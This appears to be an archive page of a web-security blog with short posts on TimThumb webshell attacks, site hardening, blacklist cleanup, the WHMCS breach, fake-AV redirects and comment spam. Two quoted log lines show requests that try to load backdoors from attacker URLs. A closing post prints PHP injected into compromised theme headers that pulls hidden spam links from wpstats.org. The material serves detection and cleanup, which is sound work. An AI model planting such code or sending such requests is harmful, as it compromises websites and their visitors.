List of Domains Hosting Webshells for Timthumb Attacks

We have been tracking TimThumb related attacks for a while and they are still at full force (yes, some people are still using the outdated versions and getting compromised).

Just for the month of May, we identified more than 400 domains hosting backdoors for those type of attacks and a botnet with more than 1,000 IP addresses scanning sites that might be vulnerable to it.

If you like to look at your logs, that’s how it would look like:

216.227.214.242 – - [31/May/2012:03:55:35 +0000] “GET /wp-content/themes/vibrantcms/thumb.php?src=http://blogger.com.nilgirisrealty.com/cok.php HTTP/1.1″ 404 9347 “-” “”

or

112.78.3.167 – - [31/May/2012:03:45:50 +0000] “GET //wp-content/themes/Quadro/timthumb.php?src=http://img.youtube.com.spectra-entertainment.com/upload.php HTTP/1.1″ 404 305 “-” “”

Basically searching for hundreds of themes per site that could have the old timthumb.php enabled and attempting to insert the backdoors from http://img.youtube.com.spectra-entertainment.com/upload.php and http://blogger.com.nilgirisrealty.com/cok.php on it.

The full list of domains hosting the backdoor is on our labs post:

List of domains hosting webshells for Timthumb attacks

and the list of IP addresses there too:

List of IP addresses scanning for vulnerable timthumb .

Sucuri is Hiring: Senior Security Support Analyst

Its that time again, we’re actively looking for a Senior Security Support Analyst to join the family. If you are passionate about web-based malware, we want to hear from you. Details can be found here http://sucuri.net/company/employment

How To: Enhance User Security with Dreamhost

If you are using DreamHost, we recommend a few options to increase the security of your sites in their environment:

    1. Enhanced User Security

It adds a few security restrictions per site/accounts to minimize the chances of attacks from other users in the same shared server.

    1. Configure a different user account per site

There is also an option to create/isolate each site on different user accounts. We highly recommend it to minimize cross site reinfections.


Website Cross-site Contamination?

Learn more about the threats with cross-contamination by reading some of our recent posts: A Little Tale About Website Cross-Contamination and Website Cross-contamination: Blackhat SEO Spam Malware

How To… Submit Infected Site for Review with Bing Blacklisting Authority

Many are not aware that there are many different blacklisting authorities out there, some are more prevalent than others, but each have their own method of submitting for review. In this post I want to focus on Bing as a blacklisting authority specifically.

Like all the other Blacklisting authorities, Bing uses its own proprietary method for crawling your site and identifying what is and isn’t a potential security issue. We can’t talk to their accuracy, but if you use Internet Explorer or Bing as a search engine and you get a big red screen warning you of issues, then these are likely the guys to start with.

Submitting to Bing Your Site via the Bing Webmaster Tools Interface

Here are the steps to follow after you have cleaned your site:

Step 1:

They have their own webmaster tools account, separate from Google and the others. This is the link to their service: http://www.bing.com/toolbox/webmaster/ . You will need to have a Windows LiveID, but don’t worry you can create a new one for your site.

Step 2:

Once logged in, you will be on the webmaster dashboard. You want to click on “Add Site” and, well, add your site:

Step 3:

When you add the site, the next thing it is going to ask you is to verify ownership – it’ll give you three options: (a) Place XML file on web server, (b) copy / paste tag in webpage, and (c) add CNAME record to DNS, which ever you choose is your prerogative. I find it easy enough to simply drop an XML file on the server. 

Step 4:

Once it verifies it’ll give you a nice little success window and give you the option to continue.

**Note: that it’ll take about 24 hours for the site to be added and be reviewed, but if you have already been flagged it should give you a message telling you that the site is infected. Sometimes though, its not as intuitive as you might like and you might have to go hunting for it.

Step 5:

Click on your site and it should take you to the DASHBOARD for the site.

Step 6:

Click on CRAWL – next to the Dashboard option

Step 7:

Click on CRAWL DETAILS

Step 8:

: Click on the Malware Infected option to get details of where the malware was infected.

Step 9:

Verify you have removed all the infections it has found, sometimes it doesn’t give any, but if it does, be sure they are cleared.

Step 10:

Click on the notice showing the infection, and check the box to submit the site for review

**Note: It can take anywhere from 24 – 48 hours for Bing to reindex your site and clear the warning, patience is a virtue here.

 


Existing Client? No problem…

If you’re an existing client you have no need to worry about this, simply submit a ticket and we’ll be more than happy to 1 – ensure the infection has been removed and 2 – submit to this blacklisting authority on your behalf. Simply log into your account and submit a Malware Removal Request and tell us which authority is giving you problems.

 

 

WHMCS Website Hacked and Database Leaked

The WHMCS website and twitter accounts got compromised yesterday, and their full database (and files) were posted online.

WHMCS Twitter Hacked

Yes, it means that if you have an account there, or if you use any of the WHMCS products, you have to change all your passwords asap, and wait from a confirmation from them before downloading anything from their web site again (since it might still be compromised or with backdoors).

They posted the following on their blog:

Read More

The Sucuri Learn Blog

We have long known that the time was approaching in which we would need to improve our level of engagement with the community and start providing more substantial contributions around managing and securing your websites. We hope to use this blog, Learn Blog, to focus specifically on this challenge, educating our audience, such that through awareness we can improve security postures.

The idea is that our existing blog at blog.sucuri.net will revert back to its core focus of Research and Development (R&D) and other blogs will be created to focus on specific audiences.

The evolving nature of the web ecosystem has it such that its not longer about hiring a webmaster to help manage and administer your website. No, instead technologies like WordPress, Joomla, osCommerce and many others have empowered users to the point where the idea of a webmaster rarely surfaces when discussing the idea of a website. This fact is how the concept of a “Learn” blog came about.

Its about clearly articulating the basics and helping improve the knowledge across the end-user spectrum such that we can work together to combat the growing web-malware problem.

What we hope is to build a repository of knowledge that everyone can benefit from one post at a time.


If you want to know how to do something send us a note at info@sucuri.net, if we find it useful to the masses we’ll draft up a post and share it with the world.

Websites Compromised with Fake AV Campaign (Windows Web Secure Kit)

“To help protect your computer, Windows Web Secure Kit have detected trojans and is ready to remove them”. We are seeing many WordPress sites compromised with a malware redirecting users to the “Windows Web Secure Kit” fake/rogue anti virus. So if you get that message when visiting your (or any site), you know that it is likely compromised by it.

What is going on?

Once a site gets compromised, the .htaccess file gets modified to redirect users running Windows and coming from search engines to some russian sites:

http://colceadem.ru/infinity?8 OR
http://ademcolce.ru/infinity?8 OR
http://tradeincas.ru/siga?7 OR many others

Which then redirects the user to some intermediate sites (also .ru):


Read More

Official WordPress Plugin Directory – Forcing Plugin Updates

For some while we have wondered what happens when a plugin is removed from the official WordPress plugin directory for security reasons. Historically, we haven’t seen much of anything happen – no notification to users, no official blog post, nothing beyond the plugin disappearing from the repo. Sometimes when it did disappear, my understanding is updates were forced – certainly for the major vulnerabilities.

In an interesting move, it looks like some experimental changes have been made to help ensure users quickly learn there is a security problem.

Read More

Blog Comments – Analysing 100,000 Comments and Spammers

“Nice blog, thanks for the info”

“Awesome site. Great job”

“You should take part in a contest for one of the best blogs on the web. I will recommend this site!”


I know you like flattering comments on your website. And I know you love to see many comments on each one of your posts (say you community participation). Who doesn’t, right? We love them too.

So we decided to take a closer look at the last 100,000 (well, 98,238 to be more exact) comments that were sent to the network of sites that we are monitoring. How much of them are spam? Who are the most annoying spammers? And things like that.


Read More

Wpstats. org Spam and a Fake Advanced Search Plugin

If you are seeing hidden links in your WordPress site, it could be coming from wpstats.org. On some blackhat spam cases we are analysing, the following code was added to the theme header of the compromised site:

if(function_exists(‘curl_init’)) { $url = "http://www.wpstats.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data”; }

If you are not familiar with PHP, this code will contact www.wpstats.org/jquery-1.6.3.min.js, which will return a long list of hidden links to be included on your site (not visible on a normal browser).

Read More